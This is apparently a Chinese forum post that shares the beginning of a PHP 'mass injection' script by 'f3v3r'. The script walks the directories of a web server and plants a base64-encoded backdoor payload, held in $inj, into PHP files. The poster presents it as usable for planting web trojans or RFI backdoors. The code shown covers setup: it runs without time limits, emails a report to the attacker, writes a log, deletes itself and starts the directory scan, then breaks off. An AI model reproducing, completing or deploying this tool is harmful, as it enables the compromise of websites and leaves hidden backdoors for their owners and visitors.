这是一个关于PHP恶意脚本的讨论,该脚本用于批量写入档案并可能用作挂马或RFI后门。作者警告了其中的潜在风险,并指出后门代码位于$inj变量中,同时提供了邮件报告功能。脚本包括目录遍历、检查注入、注入脚本等功能,但可能引发安全问题。
批量写入档案脚本...
可以拿来挂马
也能拿来当RFI的后门注入
code都写明的,有需要的请自己看
后门写在$inj里面,要做base64 encode的Polymorphic
不希望这个东西被搞破坏的人拿去玩
懂原理的就自个儿收下吧
*******************************************************************
set_time_limit(0);
ignore_user_abort(1);
# PHP Mass Injection Script. by f3v3r ver.228
# |1| Look for PHP in directory.|2| Check injected.
# |3| Inject script. |4|Can email report to you.
$inj ='';
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
$email = 'f3v3r@cc.cc';
$log_report = 1;
$filename = '__log.html';
$delete_me = 1;
echo 'f3v3r injection toolzDefacez aint hack, r00tz r.
';
$dir = opendir('.');
$site=(isset(
*******************************************************************
扫一扫
214
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
